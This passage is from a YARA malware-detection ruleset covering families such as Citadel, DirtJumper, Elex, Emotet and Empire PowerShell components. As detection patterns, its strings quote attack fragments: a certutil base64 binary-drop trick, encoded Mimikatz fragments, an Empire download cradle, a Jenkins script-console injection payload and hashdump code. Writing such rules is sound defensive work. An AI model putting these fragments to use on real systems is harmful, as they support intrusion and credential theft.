// pe.imports are undefined for non-PE input, so the rule is then false.
rule Batel_export_function {
    meta:
        author = "@j0sm1"
        date = "2016/10/15"
        description = "Batel backdoor"
        reference = "https://www.symantec.com/security_response/writeup.jsp?docid=2016-091923-4146-99"
        filetype = "binary"
    condition:
        pe.exports("run_shell")
        and pe.imports("kernel32.dll", "GetTickCount")
        and pe.imports("kernel32.dll", "IsDebuggerPresent")
        and pe.imports("msvcr100.dll", "_crt_debugger_hook")
        and pe.imports("kernel32.dll", "TerminateProcess")
        and pe.imports("kernel32.dll", "UnhandledExceptionFilter")
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

// Black Revolution DDoS bot: attack-mode and control keywords. Most of the
// $opt strings are short common words, so the rule relies on the conjunction
// (all four $base words plus five $opt words) rather than on any single string.
rule BlackRev {
    meta:
        author = "Dennis Schwarz"
        date = "2013-05-21"
        description = "Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/"
        origin = "https://github.com/arbor/yara/blob/master/blackrev.yara"
    strings:
        $base1 = "http"
        $base2 = "simple"
        $base3 = "loginpost"
        $base4 = "datapost"
        $opt1 = "blackrev"
        $opt2 = "stop"
        $opt3 = "die"
        $opt4 = "sleep"
        $opt5 = "syn"
        $opt6 = "udp"
        $opt7 = "udpdata"
        $opt8 = "icmp"
        $opt9 = "antiddos"
        $opt10 = "range"
        $opt11 = "fastddos"
        $opt12 = "slowhttp"
        $opt13 = "allhttp"
        $opt14 = "tcpdata"
        $opt15 = "dataget"
    condition:
        all of ($base*) and 5 of ($opt*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

// BlackWorm (.NET): VB.NET "My" namespace member names plus two wide strings
// from the version resource. All eleven must be present.
rule BlackWorm {
    meta:
        author = "Brian Wallace @botnet_hunter"
        author_email = "bwall@ballastsecurity.net"
        date = "2015-05-20"
        description = "Identify BlackWorm"
    strings:
        $str1 = "m_ComputerObjectProvider"
        $str2 = "MyWebServices"
        $str3 = "get_ExecutablePath"
        $str4 = "get_WebServices"
        $str5 = "My.WebServices"
        $str6 = "My.User"
        $str7 = "m_UserObjectProvider"
        $str8 = "DelegateCallback"
        $str9 = "TargetMethod"
        $str10 = "000004b0" wide
        $str11 = "Microsoft Corporation" wide
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

import "pe"

// Boouset: four consecutive C6 (mov byte) instructions whose immediates are
// 62 6F 6F 75 ("boou"), i.e. the string assembled byte by byte.
rule BoousetCode {
    meta:
        description = "Boouset code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    strings:
        $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 }
    condition:
        any of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license.
*/ import "pe" rule Bublik { meta: author="Kevin Falcoz" date="29/09/2013" description="Bublik Trojan Downloader" strings: $signature1={63 6F 6E 73 6F 6C 61 73} $signature2={63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69} condition: $signature1 and $signature2 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Win32_Buzus_Softpulse { meta: description = "Trojan Buzus / Softpulse" author = "Florian Roth" date = "2015-05-13" hash = "2f6df200e63a86768471399a74180466d2e99ea9" score = 75 strings: $x1 = "pi4izd6vp0.com" fullword ascii $s1 = "SELECT * FROM Win32_Process" fullword wide $s4 = "CurrentVersion\\Uninstall\\avast" fullword wide $s5 = "Find_RepeatProcess" fullword ascii $s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" fullword wide $s7 = "myapp.exe" fullword ascii $s14 = "/c ping -n 1 www.google" wide condition: uint16(0) == 0x5a4d and ( ( $x1 and 2 of ($s*) ) or all of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule CAP_HookExKeylogger { meta: author = "Brian C. Bell -- @biebsmalwareguy" reference = "https://github.com/DFIRnotes/rules/blob/master/CAP_HookExKeylogger.yar" strings: $str_Win32hookapi = "SetWindowsHookEx" nocase $str_Win32llkey = "WH_KEYBOARD_LL" nocase $str_Win32key = "WH_KEYBOARD" nocase condition: 2 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/

// Chicken DDoS (Win32 dropper and dropped service): one of the two PDB
// paths plus five of the runtime strings (config name, DNS server, the
// DbProtectSupport service and its npf.sys driver path).
rule ChickenDOS {
    meta:
        author = "Jason Jones <jasonjones@arbor.net>"
        description = "Win32-variant of Chicken ident for both dropper and dropped file"
        source = "https://github.com/arbor/yara/blob/master/chicken.yara"
    strings:
        $pdb1 = "\\Chicken\\Release\\svchost.pdb"
        $pdb2 = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb"
        $str2 = "fake.cf"
        $str3 = "8.8.8.8"
        $str4 = "Processor(%d)\\"
        $str5 = "DbProtectSupport"
        $str1 = "dm1712/`jvpnpkte/bpl"
        $str6 = "InstallService NPF %d"
        $str7 = "68961"
        $str8 = "InstallService DbProtectSupport %d"
        $str9 = "C:\\Program Files\\DbProtectSupport\\npf.sys"
    condition:
        ($pdb1 or $pdb2) and 5 of ($str*)
}

// Chicken DDoS, Linux build: config file name, both source file names left
// in the binary, and three of the format/identifier strings.
rule ChickenDOS_Linux {
    meta:
        author = "Jason Jones <jasonjones@arbor.net>"
        description = "Linux-variant of Chicken ident for both dropper and dropped file"
        source = "https://github.com/arbor/yara/blob/master/chicken.yara"
    strings:
        $cfg = "fake.cfg"
        $file1 = "ThreadAttack.cpp"
        $file2 = "Fake.cpp"
        $str1 = "dns_array"
        $str2 = "DomainRandEx"
        $str3 = "cpu %llu %llu %llu %llu"
        $str4 = "[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %s" ascii
    condition:
        $cfg and all of ($file*) and 3 of ($str*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

// Citadel 1.5.x.y banker, meant for memory (filetype = "memory"). Any three
// of the eight strings match; $ggurl is a plain Google URL and is the least
// specific of the set, so it should not be the only evidence relied on.
rule citadel13xy {
    meta:
        author = "Jean-Philippe Teissier / @Jipe_"
        description = "Citadel 1.5.x.y trojan banker"
        date = "2013-01-12"
        version = "1.0"
        filetype = "memory"
    strings:
        $a = "Coded by BRIAN KREBS for personnal use only. I love my job & wife."
        $b = "http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php"
        $c = "%BOTID%"
        $d = "%BOTNET%"
        $e = "cit_video.module"
        $f = "bc_remove"
        $g = "bc_add"
        $ggurl = "http://www.google.com/webhp"
    condition:
        3 of them
}

// Citadel copies patched ("hexed") to hook nss3.dll on Firefox > 23: both
// marker strings plus two of the four code fragments.
rule Citadel_Malware {
    meta:
        author = "xylitol@temari.fr"
        date = "2015-10-08"
        description = "Search for nss3.dll pattern indicating an hexed copy of Citadel malware to work on firefox > v23.0"
        // May only the challenge guide you
    strings:
        $s1 = "Coded by BRIAN KREBS for personal use only. I love my job & wife" wide ascii
        $s2 = "nss3.dll" wide ascii
        $h1 = {8B C7 EB F5 55 8B EC}
        $h2 = {55 8B EC 83 EC 0C 8A 82 00 01 00 00}
        $h3 = {3D D0 FF 1F 03 77 ?? 83 7D}
        $h4 = {83 F9 66 74 ?? 83 F9 6E 74 ?? 83 F9 76 74 ?? 83 F9 7A}
    condition:
        all of ($s*) and 2 of ($h*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

/*
    Generic Cloaking
    Florian Roth
    BSK Consulting GmbH

    License: Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)
    Copyright and related rights waived via https://creativecommons.org/licenses/by-nc-sa/4.0/
*/

// Batch-file technique: a binary written out as a fake PEM certificate and
// decoded with certutil. All three command fragments must be in a small file.
rule Binary_Drop_Certutil {
    meta:
        description = "Drop binary as base64 encoded cert trick"
        author = "Florian Roth"
        reference = "https://goo.gl/9DNn8q"
        date = "2015-07-15"
        score = 70
    strings:
        $s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
        $s1 = "echo -----END CERTIFICATE----- >>" ascii
        $s2 = "certutil -decode " ascii
    condition:
        filesize < 10KB and all of them
}

// Mimikatz embedded in other file types: two base64 fragments of the
// encoded payload, either one is enough.
rule StegoKatz {
    meta:
        description = "Encoded Mimikatz in other file types"
        author = "Florian Roth"
        reference = "https://goo.gl/jWPBBY"
        date = "2015-09-11"
        score = 70
    strings:
        $s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii
        $s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii
    condition:
        filesize < 1000KB and 1 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

import "pe"

// Cookies: either two of the self-extracting archive markers ($zip*, the
// "PK" suffix is the zip local-file header following the name) or two of
// the command/status strings of the executable ($exe*).
rule CookiesStrings {
    meta:
        description = "Cookies Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-20"
    strings:
        $zip1 = "ntdll.exePK"
        $zip2 = "AcroRd32.exePK"
        $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
        $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
        $exe1 = "Leave GetCommand!"
        $exe2 = "perform exe success!"
        $exe3 = "perform exe failure!"
        $exe4 = "Entry SendCommandReq!"
        $exe5 = "Reqfile not exist!"
        $exe6 = "LeaveDealUpfile!"
        $exe7 = "Entry PostData!"
        $exe8 = "Leave PostFile!"
        $exe9 = "Entry PostFile!"
        $exe10 = "\\unknow.zip" wide ascii
        $exe11 = "the url no respon!"
    condition:
        (2 of ($zip*)) or (2 of ($exe*))
}

// Umbrella rule; depends on CookiesStrings defined above.
rule Cookies {
    meta:
        description = "Cookies"
        author = "Seth Hardy"
        last_modified = "2014-06-20"
    condition:
        CookiesStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license.
*/ rule CorkowDLL { meta: description = "Rule to detect the Corkow DLL files" reference = "IB-Group | http://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf" strings: $mz = { 4d 5a } $binary1 = {60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3} $binary2 = {(FF75??|53)FF7510FF750CFF7508E8????????[3-9]C9C20C 00} $export1 = "Control_RunDLL" $export2 = "ServiceMain" $export3 = "DllGetClassObject" condition: ($mz at 0) and ($binary1 and $binary2) and any of ($export*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule cxpidStrings { meta: description = "cxpid Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-23" strings: $ = "/cxpid/submit.php?SessionID=" $ = "/cxgid/" $ = "E21BC52BEA2FEF26D005CF" $ = "E21BC52BEA39E435C40CD8" $ = " -,L-,O+,Q-,R-,Y-,S-" condition: any of them } rule cxpidCode { meta: description = "cxpid code features" author = "Seth Hardy" last_modified = "2014-06-23" strings: $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 } condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Cythosia { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2015-03-21" description = "Identify Cythosia" strings: $str1 = "HarvesterSocksBot.Properties.Resources" wide condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ rule DDosTf { meta: author = "benkow_ - MalwareMustDie" reference = "http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html" description = "Rule to detect ELF.DDosTf infection" strings: $st0 = "ddos.tf" $st1 = {E8 AE BE E7 BD AE 54 43 50 5F 4B 45 45 50 49 4E 54 56 4C E9 94 99 E8 AF AF EF BC 9A 00} /*TCP_KEEPINTVL*/ $st2 = {E8 AE BE E7 BD AE 54 43 50 5F 4B 45 45 50 43 4E 54 E9 94 99 E8 AF AF EF BC 9A 00} /*TCP_KEEPCNT*/ $st3 = "Accept-Language: zh" $st4 = "%d Kb/bps|%d%%" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Derkziel { meta: description = "Derkziel info stealer (Steam, Opera, Yandex, ...)" author = "The Malware Hunter" filetype = "pe" date = "2015-11" md5 = "f5956953b7a4acab2e6fa478c0015972" site = "https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972" reference = "https://bhf.su/threads/137898/" strings: $drz = "{!}DRZ{!}" $ua = "User-Agent: Uploador" $steam = "SteamAppData.vdf" $login = "loginusers.vdf" $config = "config.vdf" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ import "pe" rule Dexter_Malware { meta: description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b" author = "Florian Roth" reference = "http://goo.gl/oBvy8b" date = "2015/02/10" score = 70 strings: $s0 = "Java Security Plugin" fullword wide $s1 = "%s\\%s\\%s.exe" fullword wide $s2 = "Sun Java Security Plugin" fullword wide $s3 = "\\Internet Explorer\\iexplore.exe" fullword wide condition: all of them } rule dexter_strings { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-09-10" description = "Identify Dexter POSGrabber" strings: $s1 = "UpdateMutex:" $s2 = "response=" $s3 = "page=" $s4 = "scanin:" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule diamond_fox { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2015-08-22" description = "Identify DiamondFox" strings: $s1 = "UPDATE_B" $s2 = "UNISTALL_B" $s3 = "S_PROTECT" $s4 = "P_WALLET" $s5 = "GR_COMMAND" $s6 = "FTPUPLOAD" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
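*/

// Drive (DirtJumper family), first version. The three Drive rules share the
// same command switches and strings and differ only in which $newver
// markers must be absent or present, so a sample matches exactly one of them.
rule DirtJumper_drive {
    meta:
        author = "Jason Jones <jasonjones@arbor.net>"
        date = "2013-08-26"
        description = "Identify first version of drive DDoS malware"
        source = "https://github.com/arbor/yara/blob/master/drive.yara"
    strings:
        $cmd1 = "-get" fullword
        $cmd2 = "-ip" fullword
        $cmd3 = "-ip2" fullword
        $cmd4 = "-post1" fullword
        $cmd5 = "-post2" fullword
        $cmd6 = "-udp" fullword
        $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
        $str2 = "-timeout" fullword
        $str3 = "-thread" fullword
        $str4 = " Local; ru) Presto/2.10.289 Version/"
        $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
        $newver1 = "-icmp"
        $newver2 = "<xmp>"
    condition:
        // first version: none of the newer-version markers may be present
        4 of ($cmd*) and all of ($str*) and not any of ($newver*)
}

// Drive, newer version: same base set plus all four newer-version markers.
rule DirtJumper_drive2 {
    meta:
        author = "Jason Jones <jasonjones@arbor.net>"
        date = "2013-08-26"
        description = "Identify newer version of drive DDoS malware"
        source = "https://github.com/arbor/yara/blob/master/drive2.yara"
    strings:
        $cmd1 = "-get" fullword
        $cmd2 = "-ip" fullword
        $cmd3 = "-ip2" fullword
        $cmd4 = "-post1" fullword
        $cmd5 = "-post2" fullword
        $cmd6 = "-udp" fullword
        $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
        $str2 = "-timeout" fullword
        $str3 = "-thread" fullword
        $str4 = " Local; ru) Presto/2.10.289 Version/"
        $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
        $newver1 = "-icmp"
        $newver2 = "-byte"
        $newver3 = "-long"
        $newver4 = "<xmp>"
    condition:
        4 of ($cmd*) and all of ($str*) and all of ($newver*)
}

// Drive, compromised-site version: as drive2 (without "<xmp>") plus the
// "99=1" marker.
rule DirtJumper_drive3 {
    meta:
        author = "Jason Jones <jasonjones@arbor.net>"
        date = "2014-03-17"
        description = "Identify version of Drive DDoS malware using compromised sites"
        source = "https://github.com/arbor/yara/blob/master/drive3.yara"
    strings:
        $cmd1 = "-get" fullword
        $cmd2 = "-ip" fullword
        $cmd3 = "-ip2" fullword
        $cmd4 = "-post1" fullword
        $cmd5 = "-post2" fullword
        $cmd6 = "-udp" fullword
        $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
        $str2 = "-timeout" fullword
        $str3 = "-thread" fullword
        $str4 = " Local; ru) Presto/2.10.289 Version/"
        $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
        $newver1 = "-icmp"
        $newver2 = "-byte"
        $newver3 = "-long"
        $drive3 = "99=1"
    condition:
        4 of ($cmd*) and all of ($str*) and all of ($newver*) and $drive3
}

// EICAR anti-virus test file (harmless by design); useful to confirm a
// scanner is wired up. hash1 is the SHA-256 of the standard 68-byte file.
rule eicar {
    meta:
        description = "Rule to detect Eicar pattern"
        author = "Marc Rivero | @seifreed"
        hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
    strings:
        $s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

import "pe"

// Elex family (CCN). In all six rules below the former "$mz at 0" check with
// $mz = { 4d 5a } is written as uint16(0) == 0x5a4d: the same test (bytes
// 4D 5A at offset 0) without a 2-byte atom that YARA has to search for
// across the whole file.

// NSIS installer: "Nullsoft" (4e 75 6c 6c 73 6f 66 74) at a fixed offset and
// an 8-byte blob at a second fixed offset, so only this exact build matches.
rule Trj_Elex_Installer_NSIS {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        description = "Elex Installer NSIS"
        ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    strings:
        $str1 = {4e 75 6c 6c 73 6f 66 74 }
        $str2 = {b7 a2 d5 dc 0c d6 a6 3a}
    condition:
        uint16(0) == 0x5a4d and ($str1 at 0xA008) and ($str2 at 0x1c8700)
}

// Installer: UTF-16LE "everything" plus IsWow64Process and the "SSFK" tag.
rule Trj_Elex_Installer {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        description = "Elex Installer"
        ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    strings:
        $str1 = {65 00 76 00 65 00 72 00 79 00 74 00 68 00 69 00 6e 00 67 00}
        $str2 = "IsWow64Process"
        $str3 = "SSFK"
    condition:
        uint16(0) == 0x5a4d and ($str1) and ($str2) and ($str3)
}

// Service, 32-bit: two URLs and an identifier string; pe.machine is
// undefined for non-PE input, which makes the whole condition false.
rule Trj_Elex_Service32 {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        description = "Elex Service 32 bits"
        ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    strings:
        $str1 = "http://xa.xingcloud.com/v4/sof-everything/"
        $str2 = "http://www.mysearch123.com"
        $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma"
    condition:
        (pe.machine == pe.MACHINE_I386) and uint16(0) == 0x5a4d and ($str1) and ($str2) and ($str3)
}

// Service, 64-bit: same strings as Service32, AMD64 machine type.
rule Trj_Elex_Service64 {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        description = "Elex Service 64 bits"
        ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    strings:
        $str1 = "http://xa.xingcloud.com/v4/sof-everything/"
        $str2 = "http://www.mysearch123.com"
        $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma"
    condition:
        (pe.machine == pe.MACHINE_AMD64) and uint16(0) == 0x5a4d and ($str1) and ($str2) and ($str3)
}

// DLL, 32-bit: UTF-16LE "Yrrehs" plus the "RookIE/1.0" User-Agent, and the
// DLL characteristic bit must be set.
rule Trj_Elex_Dll32 {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        description = "Elex DLL 32 bits"
        ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    strings:
        $str1 = {59 00 72 00 72 00 65 00 68 00 73 00}
        $str2 = "RookIE/1.0"
    condition:
        (pe.machine == pe.MACHINE_I386) and (pe.characteristics & pe.DLL) and uint16(0) == 0x5a4d and ($str1) and ($str2)
}

// DLL, 64-bit: same strings as Dll32, AMD64 machine type.
rule Trj_Elex_Dll64 {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        description = "Elex DLL 64 bits"
        ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    strings:
        $str1 = {59 00 72 00 72 00 65 00 68 00 73 00}
        $str2 = "RookIE/1.0"
    condition:
        (pe.machine == pe.MACHINE_AMD64) and (pe.characteristics & pe.DLL) and uint16(0) == 0x5a4d and ($str1) and ($str2)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license.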
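*/

// elknot / BillGates (Linux DDoS bot) variants with the XOR-style C2
// decryption routine; one of the two code fragments (one per sample) matches.
rule elknot_xor : malware {
    meta:
        author = "liuya@360.cn"
        date = "2016-04-25"
        description = "elknot/Billgates variants with XOR like C2 encryption scheme"
        reference = "http://liuya0904.blogspot.tw/2016/04/new-elknotbillgates-variant-with-xor.html"
        sample = "474429d9da170e733213940acc9a2b1c, 2579aa65a28c32778790ec1c673abc49"
    strings:
        // md5=474429d9da170e733213940acc9a2b1c
        /*
        seg000:08130801 68 00 09 13 08          push    offset dword_8130900
        seg000:08130806 83 3D 30 17 13 08 02    cmp     ds:dword_8131730, 2
        seg000:0813080D 75 07                   jnz     short loc_8130816
        seg000:0813080F 81 04 24 00 01 00 00    add     dword ptr [esp], 100h
        seg000:08130816 loc_8130816:
        seg000:08130816 50                      push    eax
        seg000:08130817 E8 15 00 00 00          call    sub_8130831
        seg000:0813081C E9 C8 F6 F5 FF          jmp     near ptr 808FEE9h
        */
        $decrypt_c2_func_1 = {08 83 [5] 02 75 07 81 04 24 00 01 00 00 50 e8 [4] e9}
        // md5=2579aa65a28c32778790ec1c673abc49
        /*
        .rodata:08104D20 E8 00 00 00 00          call    $+5
        .rodata:08104D25 87 1C 24                xchg    ebx, [esp+4+var_4] ;
        .rodata:08104D28 83 EB 05                sub     ebx, 5
        .rodata:08104D2B 8D 83 00 FD FF FF       lea     eax, [ebx-300h]
        .rodata:08104D31 83 BB 10 CA 02 00 02    cmp     dword ptr [ebx+2CA10h], 2
        .rodata:08104D38 75 05                   jnz     short loc_8104D3F
        .rodata:08104D3A 05 00 01 00 00          add     eax, 100h
        .rodata:08104D3F loc_8104D3F:
        .rodata:08104D3F 50                      push    eax
        .rodata:08104D40 FF 74 24 10             push    [esp+8+strsVector]
        */
        $decrypt_c2_func_2 = {e8 00 00 00 00 87 [2] 83 eb 05 8d 83 [4] 83 bb [4] 02 75 05}
    condition:
        1 of ($decrypt_c2_func_*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

// Emotet loader: the indirect-call sequence $_eax must sit in the
// 0x2854..0x4000 file range, together with one of two other code fragments.
rule Emotets {
    meta:
        author = "pekeinfo"
        date = "2017-10-18"
        description = "Emotets"
    strings:
        $cmovnz = { 0f 45 fb 0f 45 de }
        $mov_esp_0 = { C7 04 24 00 00 00 00 89 44 24 0? }
        $_eax = { 89 E? 8D ?? 24 ?? 89 ?? FF D0 83 EC 04 }
    condition:
        // uint16(0) == 0x5a4d replaces the former "$mz at 0" with
        // $mz = { 4d 5a }: same test (bytes 4D 5A at offset 0), no 2-byte atom
        (uint16(0) == 0x5a4d and $_eax in (0x2854..0x4000))
        and ($cmovnz or $mov_esp_0)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

/* Rule Set ----------------------------------------------------------------- */

// Empire (PowerShell post-exploitation framework) components, one rule per
// script. Each condition follows the same shape: a small file whose first
// two bytes are the script's expected opening characters (uint16 is read
// little-endian, so 0x7566 is "fu" as in "function", 0x6620 is " f",
// 0x2023 is "# ", 0x233c is "<#") plus one string, or every string
// regardless of header and size. Strings are verbatim lines from the scripts.

rule Empire_Invoke_MetasploitPayload {
    meta:
        description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
    strings:
        $s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
        $s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
    condition:
        (uint16(0) == 0x7566 and filesize < 9KB and 1 of them) or all of them
}

rule Empire_Exploit_Jenkins {
    meta:
        description = "Detects Empire component - file Exploit-Jenkins.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
    strings:
        $s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
        $s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
        $s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
    condition:
        (uint16(0) == 0x6620 and filesize < 7KB and 1 of them) or all of them
}

rule Empire_Get_SecurityPackages {
    meta:
        description = "Detects Empire component - file Get-SecurityPackages.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
    strings:
        $s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
        $s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
    condition:
        (uint16(0) == 0x7566 and filesize < 20KB and 1 of them) or all of them
}

rule Empire_Invoke_PowerDump {
    meta:
        description = "Detects Empire component - file Invoke-PowerDump.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
    strings:
        $x16 = "$enc = Get-PostHashdumpScript" fullword ascii
        $x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
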